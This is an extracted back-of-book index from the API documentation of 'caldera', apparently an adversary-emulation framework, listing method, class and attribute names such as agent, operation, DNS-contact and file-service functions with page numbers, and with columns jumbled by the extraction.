get_object() (app.api.v2.handlers.base_object_api.BaseObjectApi
get_payload_packer() (app.service.file_svc.FileSvc
method), 141 method), 198
get_objective_by_id() get_permissions() (app.service.auth_svc.AuthService
(app.api.v2.handlers.objective_api.ObjectiveApi method), 194
method), 143 get_permissions() (app.service.interfaces.i_auth_svc.AuthServiceInterfa
get_objectives() (app.api.v2.handlers.objective_api.ObjectiveApi method), 185
method), 143 get_planner_by_id()
get_opcode() (app.contacts.contact_dns.DnsPacket (app.api.v2.handlers.planner_api.PlannerApi
method), 157 method), 144
get_operation_by_id() get_planners() (app.api.v2.handlers.planner_api.PlannerApi
(app.api.v2.handlers.operation_api.OperationApi method), 144
method), 144 get_plugin_by_name()
get_operation_event_logs() (app.api.v2.handlers.plugins_api.PluginApi
(app.api.v2.handlers.operation_api.OperationApi method), 145
method), 144 get_plugins() (app.api.v2.handlers.plugins_api.PluginApi
get_operation_event_logs() method), 145
(app.api.v2.managers.operation_api_manager.OperationApiManager
get_potential_links()
method), 148 (app.api.v2.handlers.operation_api.OperationApi
get_operation_link() method), 144
(app.api.v2.handlers.operation_api.OperationApi get_potential_links()
method), 144 (app.api.v2.managers.operation_api_manager.OperationApiMana
get_operation_link() method), 148
(app.api.v2.managers.operation_api_manager.OperationApiManager
get_potential_links()
method), 148 (app.service.interfaces.i_rest_svc.RestServiceInterface
get_operation_link_result() method), 191
(app.api.v2.handlers.operation_api.OperationApi get_potential_links()
method), 144 (app.service.rest_svc.RestService method),
get_operation_link_result() 205
(app.api.v2.managers.operation_api_manager.OperationApiManager
get_potential_links_by_paw()
method), 148 (app.api.v2.handlers.operation_api.OperationApi
get_operation_links() method), 144
(app.api.v2.handlers.operation_api.OperationApi get_preferred_executor()
method), 144 (app.objects.c_agent.Agent method), 176
get_operation_links() get_relationships()
(app.api.v2.managers.operation_api_manager.OperationApiManager
(app.api.v2.handlers.fact_api.FactApi method),
method), 148 142
get_operation_object() get_relationships()
(app.api.v2.managers.operation_api_manager.OperationApiManager
(app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterfa
method), 148 method), 189
get_operation_report() get_relationships()
(app.api.v2.handlers.operation_api.OperationApi (app.service.knowledge_svc.KnowledgeService
method), 144 method), 200
get_operation_report() get_relationships_by_operation_id()
(app.api.v2.managers.operation_api_manager.OperationApiManager
(app.api.v2.handlers.fact_api.FactApi method),
method), 148 142
get_operations() (app.api.v2.handlers.operation_api.OperationApi
get_request_permissions()
method), 144 (app.api.v2.handlers.base_api.BaseApi
get_payload_file() (app.contacts.contact_ftp.FtpHandler method), 141
method), 159 get_response_code()
get_payload_name_from_uuid() (app.contacts.contact_dns.DnsPacket method),
(app.service.file_svc.FileSvc method), 198 157
get_payload_name_from_uuid() get_results() (app.contacts.contact_gist.Contact
Index 229
caldera
230 Index
caldera
Index 231
caldera
232 Index
caldera
Index 233
caldera
234 Index
caldera
Index 235
caldera
236 Index
caldera
Index 237
caldera
(app.api.v2.managers.base_api_manager.BaseApiManager
retrieve_compiled_file()
method), 146 (app.service.app_svc.AppService method),
replace_origin_link_id() 193
(app.objects.secondclass.c_link.Link method), retrieve_compiled_file()
167 (app.service.interfaces.i_app_svc.AppServiceInterface
report() (app.objects.c_operation.Operation method), method), 184
180 retrieve_config() (app.contacts.contact_gist.Contact
report() (in module app.service.contact_svc), 195 method), 160
request_has_valid_api_key() retrieve_config() (app.contacts.contact_slack.Contact
(app.service.auth_svc.AuthService method), method), 161
194 Rule (class in app.objects.secondclass.c_rule), 172
request_has_valid_user_session() RuleAction (class in app.utility.rule_set), 212
(app.service.auth_svc.AuthService method), RuleSchema (class in app.objects.secondclass.c_rule),
194 172
RequestBodyParseError, 152 RuleSet (class in app.utility.rule_set), 212
RequestUnparsableJsonError, 152 run() (app.contacts.handles.h_beacon.Handle static
RequestValidationError, 152 method), 154
Requirement (class in run() (app.objects.c_operation.Operation method), 180
app.objects.secondclass.c_requirement), run() (app.utility.base_obfuscator.BaseObfuscator
171 method), 206
RequirementSchema (class in RUN_ONE_LINK (app.objects.c_operation.Operation.States
app.objects.secondclass.c_requirement), attribute), 179
171 run_scheduler() (app.service.app_svc.AppService
RESERVED (app.objects.c_agent.Agent attribute), 175 method), 193
RESERVED (app.objects.secondclass.c_executor.Executor run_scheduler() (app.service.interfaces.i_app_svc.AppServiceInterface
attribute), 164 method), 184
RESERVED (app.objects.secondclass.c_link.Link at- RUNNING (app.objects.c_operation.Operation.States at-
tribute), 167 tribute), 179
response_code_mask (app.contacts.contact_dns.DnsPacket
attribute), 157 S
rest_core() (app.api.rest_api.RestApi method), 153 satisfied() (app.objects.secondclass.c_goal.Goal
rest_core_info() (app.api.rest_api.RestApi method), method), 166
153 save_fact() (app.objects.secondclass.c_link.Link
RestApi (class in app.api.rest_api), 153 method), 167
restore_state() (app.service.data_svc.DataService save_file() (app.service.file_svc.FileSvc method), 199
method), 197 save_file() (app.service.interfaces.i_file_svc.FileServiceInterface
restore_state() (app.service.interfaces.i_object_svc.ObjectServiceInterface
method), 187
method), 190 save_multipart_file_upload()
restore_state() (app.service.knowledge_svc.KnowledgeService (app.service.file_svc.FileSvc method), 199
method), 201 save_multipart_file_upload()
RestService (class in app.service.rest_svc), 205 (app.service.interfaces.i_file_svc.FileServiceInterface
RestServiceInterface (class in method), 187
app.service.interfaces.i_rest_svc), 191 save_state() (app.service.data_svc.DataService
Result (class in app.objects.secondclass.c_result), 171 method), 197
ResultSchema (class in save_state() (app.service.interfaces.i_object_svc.ObjectServiceInterface
app.objects.secondclass.c_result), 171 method), 190
resume_operations() save_state() (app.service.knowledge_svc.KnowledgeService
(app.service.app_svc.AppService method), method), 201
193 Schedule (class in app.objects.c_schedule), 182
resume_operations() ScheduleApi (class in
(app.service.interfaces.i_app_svc.AppServiceInterface app.api.v2.handlers.schedule_api), 145
method), 184 ScheduleApiManager (class in
retrieve() (app.utility.base_object.BaseObject static app.api.v2.managers.schedule_api_manager),
method), 207 148
238 Index
caldera
Index 239
caldera
start() (app.contacts.contact_udp.Contact method), 162
start() (app.contacts.contact_websocket.Contact method), 162
start() (app.contacts.tunnels.tunnel_ssh.Tunnel method), 156
start_sniffer_untrusted_agents() (app.service.app_svc.AppService method), 193
start_sniffer_untrusted_agents() (app.service.interfaces.i_app_svc.AppServiceInterface method), 184
state (app.objects.c_operation.Operation property), 180
states (app.objects.c_operation.Operation property), 180
states (app.objects.secondclass.c_link.Link property), 168
status (app.objects.secondclass.c_link.Link property), 168
stop() (app.contacts.contact_ftp.Contact method), 159
stop() (app.contacts.contact_websocket.Contact method), 162
stor() (app.contacts.contact_ftp.FtpHandler method), 159
store() (app.objects.c_ability.Ability method), 174
store() (app.objects.c_adversary.Adversary method), 175
store() (app.objects.c_agent.Agent method), 176
store() (app.objects.c_data_encoder.DataEncoder method), 177
store() (app.objects.c_obfuscator.Obfuscator method), 178
store() (app.objects.c_objective.Objective method), 178
store() (app.objects.c_operation.Operation method), 180
store() (app.objects.c_planner.Planner method), 181
store() (app.objects.c_plugin.Plugin method), 182
store() (app.objects.c_schedule.Schedule method), 182
store() (app.objects.c_source.Source method), 183
store() (app.objects.interfaces.i_object.FirstClassObjectInterface method), 163
store() (app.service.data_svc.DataService method), 197
store() (app.service.interfaces.i_data_svc.DataServiceInterface method), 186
strip_yml() (app.utility.base_world.BaseWorld static method), 211
submit_uploaded_file() (app.contacts.contact_ftp.FtpHandler method), 159
SUCCESS (app.contacts.contact_dns.DnsResponseCodes attribute), 158

T
task() (app.objects.c_agent.Agent method), 176
task_agent_with_ability() (app.service.interfaces.i_rest_svc.RestServiceInterface method), 191
task_agent_with_ability() (app.service.rest_svc.RestService method), 206
TcpSessionHandler (class in app.contacts.contact_tcp), 161
teardown() (app.service.app_svc.AppService method), 193
teardown() (app.service.interfaces.i_app_svc.AppServiceInterface method), 184
test (app.objects.secondclass.c_executor.Executor property), 164
TIME_FORMAT (app.utility.base_world.BaseWorld attribute), 210
trait (app.objects.c_source.Adjustment property), 183
trait (app.objects.secondclass.c_fact.Fact property), 165
trim_links() (app.utility.base_planning_svc.BasePlanningService method), 209
truncated() (app.contacts.contact_dns.DnsPacket method), 157
truncated_flag (app.contacts.contact_dns.DnsPacket attribute), 157
Tunnel (class in app.contacts.tunnels.tunnel_ssh), 156
TXT (app.contacts.contact_dns.DnsRecordType attribute), 157

U
unique (app.objects.c_ability.Ability property), 174
unique (app.objects.c_adversary.Adversary property), 175
unique (app.objects.c_agent.Agent property), 176
unique (app.objects.c_data_encoder.DataEncoder property), 177
unique (app.objects.c_obfuscator.Obfuscator property), 178
unique (app.objects.c_objective.Objective property), 178
unique (app.objects.c_operation.Operation property), 180
unique (app.objects.c_planner.Planner property), 181
unique (app.objects.c_plugin.Plugin property), 182
unique (app.objects.c_schedule.Schedule property), 182
unique (app.objects.c_source.Source property), 183
unique (app.objects.interfaces.i_object.FirstClassObjectInterface property), 163
unique (app.objects.secondclass.c_fact.Fact property), 165
unique (app.objects.secondclass.c_link.Link property), 168